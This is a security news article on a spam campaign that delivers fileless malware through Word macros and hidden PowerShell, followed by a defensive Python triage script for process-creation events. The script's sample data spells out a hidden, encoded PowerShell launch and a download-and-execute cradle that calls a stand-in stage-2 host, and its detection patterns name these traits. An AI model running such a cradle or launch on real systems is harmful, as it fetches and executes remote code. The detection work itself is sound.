Security researchers have identified a new twist in the tactics of cyber criminals: to deliver fileless malware to their targets, attackers are now combining spam campaigns, malicious Word documents, and PowerShell code.
To be precise, none of these techniques is new; what is new is their use together. This suggests that malware operators are paying closer attention to security research and to the work of their peers, borrowing techniques from each other in their ongoing struggle to evade detection. The researchers who discovered this campaign describe it as relatively small at the moment, having detected only 1,500 such emails so far.
Cyber criminals deliver the weaponized Word documents to their victims through spam emails. Although Word's macro feature is a well-known avenue for delivering malware, there are still countless Microsoft Office installations where macros are enabled and execute automatically when a document is opened. In those environments, once the spam campaign fools a user into opening the document, the malicious macro runs without any further interaction.
According to the researchers, the macro code embedded in each malicious document starts a hidden instance of Windows PowerShell, the scripting engine that has shipped with Windows by default since Windows 7, and uses it to download further malicious scripts, which the same PowerShell instance then executes.
The scripts support both 32-bit and 64-bit systems and begin with a series of checks: whether the computer is a virtual machine, whether any debugging software is running, and whether certain "trigger" words appear in the computer's cache and network configuration.
The string check uses both "good" and "bad" words from the attacker's point of view. If strings such as hospital, school, college, nurse or doctor are found, the script terminates immediately. If strings related to shops, stores and PoS systems are found, the scripts proceed to download whatever malware family the C&C servers instruct them to fetch.
Once that is done, the malware is written directly into the PC's memory without ever touching the hard drive, so it is never exposed to classic file-based antivirus scanning. The chain is not entirely fileless, however: the Word document and its macro still arrive on disk, and the PowerShell process itself is visible to process and command-line monitoring, which is where defenders have the best chance of catching it.
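The chain described above (an Office document spawning a hidden PowerShell that pulls a script straight into memory) is exactly what process-creation telemetry exposes, even though the final payload never touches disk. The following Python script is an added example, not code from the original article or from the researchers who analysed the campaign. It scores constructed process-creation events shaped like Sysmon Event ID 1 fields (ParentImage, Image, CommandLine), flags Office-parented or hidden, encoded PowerShell launches, and decodes the -EncodedCommand blob so that the download cradle hidden inside it becomes visible. The field names, binaries, file paths, weights and the stage-2 URL are assumptions made for the illustration.

```python
"""Triage process-creation telemetry for Office-spawned, hidden PowerShell launches.

Added example, not from the original article. Events are constructed below in the
shape of Sysmon Event ID 1 fields (ParentImage, Image, CommandLine); the paths,
weights and the stage-2 URL are made up for illustration.
"""
import base64
import re
from dataclasses import dataclass

# Office binaries that have no business spawning a script interpreter.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}

# Command-line traits of a hidden, policy-bypassing download-and-execute launch.
# Patterns cover PowerShell's common abbreviated switches (-w, -enc, -exec, -nop)
# and are matched case-insensitively.
SUSPICIOUS_ARGS = {
    "hidden_window": r"-w(?:indowstyle)?\s+hidden",
    "encoded_command": r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}",
    "bypass_policy": r"-e(?:p|x|xec|xecutionpolicy)\s+bypass",
    "no_profile": r"-nop(?:rofile)?\b",
    "download_cradle": r"downloadstring|downloadfile|invoke-webrequest|net\.webclient",
    "invoke_expression": r"\biex\b|invoke-expression",
}
# Assumed weights: an Office parent alone crosses the threshold; otherwise
# several argument traits must combine, because -w hidden or -enc on their own
# also appear in legitimate deployment tooling.
WEIGHTS = {"office_parent": 5, "hidden_window": 2, "encoded_command": 2,
           "bypass_policy": 1, "no_profile": 1, "download_cradle": 3,
           "invoke_expression": 2}
THRESHOLD = 5


@dataclass
class Finding:
    parent: str
    image: str
    reasons: list
    score: int


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmd: str) -> str:
    """Recover the -EncodedCommand payload, which PowerShell takes as base64 of UTF-16LE text."""
    match = re.search(SUSPICIOUS_ARGS["encoded_command"], cmd, re.IGNORECASE)
    if not match:
        return ""
    blob = match.group(0).split()[-1]
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze_event(event: dict) -> Finding:
    """Score one process-creation event; the decoded -enc payload is scanned as well."""
    parent = _basename(event["ParentImage"])
    image = _basename(event["Image"])
    cmd = event["CommandLine"]
    reasons = []
    if image in POWERSHELL_IMAGES:
        if parent in OFFICE_PARENTS:
            reasons.append("office_parent")
        # The download cradle usually hides inside the base64 blob, so scan the
        # raw command line and its decoded payload together.
        text = cmd + " " + decode_encoded_command(cmd)
        reasons += [name for name, pattern in SUSPICIOUS_ARGS.items()
                    if re.search(pattern, text, re.IGNORECASE)]
    return Finding(parent, image, reasons, sum(WEIGHTS[r] for r in reasons))


def triage(events, threshold: int = THRESHOLD) -> list:
    """Return findings at or above the threshold, in event order."""
    return [f for f in map(analyze_event, events) if f.score >= threshold]


# Constructed sample events. The stage-2 cradle is encoded the way a macro would
# pass it, so the raw command line of the first event shows only base64.
_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://stage2.example.invalid/s.ps1')"
_ENCODED = base64.b64encode(_STAGE2.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {   # macro-launched hidden PowerShell: the chain described in the article
        "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -NoP -W Hidden -Exec Bypass -Enc " + _ENCODED,
    },
    {   # legitimate admin script started from the desktop
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1",
    },
    {   # Word spawning the print-spooler helper: not an interpreter, ignored
        "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\splwow64.exe",
        "CommandLine": r"C:\Windows\splwow64.exe 12288",
    },
    {   # same cradle without an Office parent: flagged on argument traits alone
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -w hidden -c "' + _STAGE2 + '"',
    },
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(f"{finding.parent} -> {finding.image} score={finding.score} {finding.reasons}")
```

Running the script prints the two events that cross the threshold: the Word-parented launch (every trait fires once the encoded payload is decoded) and the cmd.exe-parented cradle, while the administrator's backup script and Word's print-spooler child stay quiet. The scoring rather than a single indicator is deliberate: -w hidden and -enc by themselves are common in legitimate software deployment, whereas an Office process spawning PowerShell at all is rare enough to justify an alert on its own.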
According to the security experts, the spam campaign has so far targeted users in the USA, Canada, the UK, France, Poland, Germany and Austria.